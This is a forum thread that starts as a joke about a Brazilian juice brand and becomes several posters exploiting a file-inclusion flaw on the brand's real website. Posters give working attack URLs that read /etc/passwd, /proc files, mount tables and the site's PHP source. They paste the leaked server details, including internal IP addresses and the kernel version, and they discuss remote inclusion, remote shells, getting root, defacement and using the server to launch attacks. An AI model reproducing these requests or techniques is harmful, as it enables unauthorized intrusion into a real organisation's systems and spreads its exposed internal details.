Sukest's Suks Juice
-
I saw this juice while shopping some time ago...
Guess what!
it doesn't sucks...
http://www.sukest.com.br/template.php?pagina=produtos.php&product=578&category=552&screen=0&search=
-
Funny. Is the name possibly related to the fact that kids might drink the juice through a straw? Or is it just a happy and amusing coincidence?
-
@cconroy said:
Funny. Is the name possibly related to the fact that kids might drink the juice through a straw? Or is it just a happy and amusing coincidence?
Probably a coincident. Its portuguese, but its a brand name so im not sure that it could mean similar to sucks in english
-
haha, the real wtf is there site. I found a way to download what seems like any file off their server
-
If you're ever in France, try this lemon soda. It's really good, even if it does taste like ... lemon soda.
-
This ad is for the Brazilian (and maybe Latin American) market.
In Portuguese, "suks" does not have any meaning, but it sounds like "suco" (juice).
-
@newfweiler said:
If you're ever in France, try this lemon soda. It's really good, even if it does taste like ... lemon soda.
Heh. I love the "Pschitt! Yourself" option on the main site.
-
@plazmo said:
haha, the real wtf is there site. I found a way to download what seems like any file off their server
Ahh, that classics. Once I figured out that "pagina" doesn't mean what I thought it did, it was easy!
http://www.sukest.com.br/template.php?pagina=/etc/passwd&product=578&category=552&screen=0&search=
Luckily, their webserver isn't running as r00t!
Bets on whether this allows remote file inclusion? *doesn't want to try*
-
http://www.sukest.com.br/template.php?pagina=/etc/slackware-version&category=552&screen=0&search=
Slackware 11. 2.6.7 kernel.
-
@kirchhoff said:
http://www.sukest.com.br/template.php?pagina=/etc/slackware-version&category=552&screen=0&search=
Slackware 11. 2.6.7 kernel.
try /proc.http://www.sukest.com.br/template.php?pagina=/proc/cpuinfo
processor : 0 vendor_id : GenuineIntel cpu family : 15 model : 6 model name : Intel(R) Pentium(R) D CPU 2.80GHz stepping : 4 cpu MHz : 2800.416 cache size : 2048 KB physical id : 0 siblings : 2 core id : 0 cpu cores : 2 fdiv_bug : no hlt_bug : no f00f_bug : no coma_bug : no fpu : yes fpu_exception : yes cpuid level : 6 wp : yes flags : fpu vme de pse tsc msr pae mce cx8 apic sep mtrr pge mca cmov pat pse36 clflush dts acpi mmx fxsr sse sse2 ss ht tm pbe nx lm constant_tsc pni monitor ds_cpl est cid cx16 xtpr lahf_lm bogomips : 5605.42 processor : 1 vendor_id : GenuineIntel cpu family : 15 model : 6 model name : Intel(R) Pentium(R) D CPU 2.80GHz stepping : 4 cpu MHz : 2800.416 cache size : 2048 KB physical id : 0 siblings : 2 core id : 1 cpu cores : 2 fdiv_bug : no hlt_bug : no f00f_bug : no coma_bug : no fpu : yes fpu_exception : yes cpuid level : 6 wp : yes flags : fpu vme de pse tsc msr pae mce cx8 apic sep mtrr pge mca cmov pat pse36 clflush dts acpi mmx fxsr sse sse2 ss ht tm pbe nx lm constant_tsc pni monitor ds_cpl est cid cx16 xtpr lahf_lm bogomips : 5600.70
http://www.sukest.com.br/template.php?pagina=/etc/mtab
/dev/sda2 / reiserfs rw 0 0 proc /proc proc rw 0 0 sysfs /sys sysfs rw 0 0 file:/home/apache /mnt/apache nfs rw,rsize=8192,wsize=8192,hard,intr,addr=10.174.141.105 0 0 file:/home/firstsite /mnt/firstsite nfs rw,addr=10.174.141.105 0 0 file:/home/sites /mnt/sites nfs rw,addr=10.174.141.105 0 0 file:/home/aceite /mnt/aceite nfs rw,rsize=8192,wsize=8192,hard,intr,addr=10.174.141.105 0 0 file:/home/tomcat4/webapps /opt/tomcat4/webapps nfs rw,addr=10.174.141.105 0 0 file:/home/web /mnt/web nfs rw,addr=10.174.141.105 0 0 file:/home/web/producao/java/tomcat5 /opt/tomcat5/webapps nfs rw,addr=10.174.141.105 0 0 file:/home/web/producao/java/tomcat3 /opt/tomcat3/webapps nfs rw,addr=10.174.141.105 0 0
http://www.sukest.com.br/template.php?pagina=/proc/uptime
8473928.52 6995444.24
http://www.sukest.com.br/template.php?pagina=/proc/net/arp
IP address HW type Flags HW address Mask Device 10.174.141.2 0x1 0x2 00:0E:0C:4E:27:E5 * eth0 10.174.141.105 0x1 0x2 00:08:54:28:E5:2F * eth0 10.174.141.5 0x1 0x2 00:0E:0C:4E:27:E5 * eth0 10.174.141.93 0x1 0x2 00:60:08:3A:11:EE * eth0 10.0.0.20 0x1 0x2 00:01:03:DD:1B:9F * eth0 10.174.141.110 0x1 0x2 00:50:04:81:5F:96 * eth0 10.174.141.91 0x1 0x2 00:60:08:3A:11:EE * eth0
http://www.sukest.com.br/template.php?pagina=/proc/net/dev
Inter-| Receive | Transmit face |bytes packets errs drop fifo frame compressed multicast|bytes packets errs drop fifo colls carrier compressed eth0:871871887 680310827 15 0 0 15 0 0 2100491378 743447569 0 0 0 0 0 0 lo: 628831 7990 0 0 0 0 0 0 628831 7990 0 0 0 0 0 0
If anyone is really adventurous, go try and open some logs or a httpd.conf somewhere.
-
http://www.sukest.com.br/neodownload/force_download.php?file=/mnt/apache/www.sukest.com.br/template.php&name=template.php
-
-
<font size="3"><font color="#000000"><font face="MS Sans Serif">purely out of interest, do you guys know what a honeypot system is? :)
</font></font></font>
-
@KluZz said:
<font size="3"><font color="#000000"><font face="MS Sans Serif">purely out of interest, do you guys know what a honeypot system is? :)
</font></font></font>
Ooh, look. A shiny <font>. cute. :)
-
The script is clearly running on the web server.
You would face a honeypot trap when you try to sneak from a server to another. Eg. compromise the server and try to access another one on the network from it.
I could be wrong, but this one is certainly not a honeypot.
-
@KluZz said:
<font size="3"><font color="#000000"><font face="MS Sans Serif">purely out of interest, do you guys know what a honeypot system is? :)
</font></font></font>Its a server set up with an intentional flaw to trap attackers.
Ive seen a few in the past, but i dont think this is one.
-
At least the webserver doesn't run as root ;)
-
@fennec said:
@KluZz said:
<FONT size=3><FONT color=#000000><FONT face="MS Sans Serif">purely out of interest, do you guys know what a honeypot system is? :)
Ooh, look. A shiny <font>. cute. :)
</FONT></FONT></FONT>There was that one person -- still may be around, actually -- that would embiggen and bold the first letter of all of his/her posts, in what I suppose was intended to be "ye olde manuscript" style.
-
@kirchhoff said:
http://www.sukest.com.br/template.php?pagina=/etc/slackware-version&category=552&screen=0&search=
Slackware 11. 2.6.7 kernel.
http://www.sukest.com.br/template.php?pagina=/proc/version&category=552&screen=0&search=
Linux version 2.6.19.1-POWER_EDGE_840 (root@web1) (gcc version 3.4.6) #3 SMP Tue Jan 2 14:14:51 BRST 2007 <br></p>
-
Oddly, it won't let you view /dev/zero, /dev/random, or /dev/urandom.
-
Awesome.
-
a href="template.php?pagina=arearestrita.htm&PHPSESSID=27f9ab0cde991c62f588ba7fce186b40
Session ID hardcoded into the php source? This is madness.
-
@Kemp said:
a href="template.php?pagina=arearestrita.htm&PHPSESSID=27f9ab0cde991c62f588ba7fce186b40
Session ID hardcoded into the php source? This is madness.An artifact from slightly incorrect usage of session vars.
-
Ok, this is even more messed up than I thought. The "pagina" variable in template.php (thanks for that link :P) is run straight through include(), which according to the php document site: http://www.php.net/manual/en/function.include.php will allow remote execution of php files. This seems to me that one could write a php file that prints out php text, put it somewhere public, and have this site read it in. You know have unfettered access to the system (probably quite easy to write a remote shell) and can I'm sure quite easily get root access.
I think someone needs to send an anonymous letter to this site warning them of the gaping security hole here...
-
The hosting provider is using privledge separation. The site is running as a virtual-host specific user without access to any really interesting files. You can certainly deface the site, but that's not very useful. It might be neat to launch attacks from it though, or configure it to run a Tor exit node.
-
@JamesKilton said:
Ok, this is even more messed up than I thought. The "pagina" variable in template.php (thanks for that link :P) is run straight through include(), which according to the php document site: http://www.php.net/manual/en/function.include.php will allow remote execution of php files.
Sure, it's used in an include() statement, but file_exists() is used to check if the file exists. Since this fails for remote files, no remote inclusion can be done.
-
Awesome. How many times do you get to download the sourcecode of a WTF straight from the implementation?
-
The best part is where they put .passwd_root_neodownload in a subdirectory of the login script, for easy access with any browser.
-
@JamesKilton said:
I think someone needs to send an anonymous letter to this site warning them of the gaping security hole here...
From their own root account.
-
@Faxmachinen said:
Awesome. How many times do you get to download the sourcecode of a WTF straight from the implementation?Heh. Maybe the code was released under the Affero Licence?
-
@Faxmachinen said:
The best part is where they put .passwd_root_neodownload in a subdirectory of the login script, for easy access with any browser.Yeah i seen that, but at least they didn't store the passwords as plain text.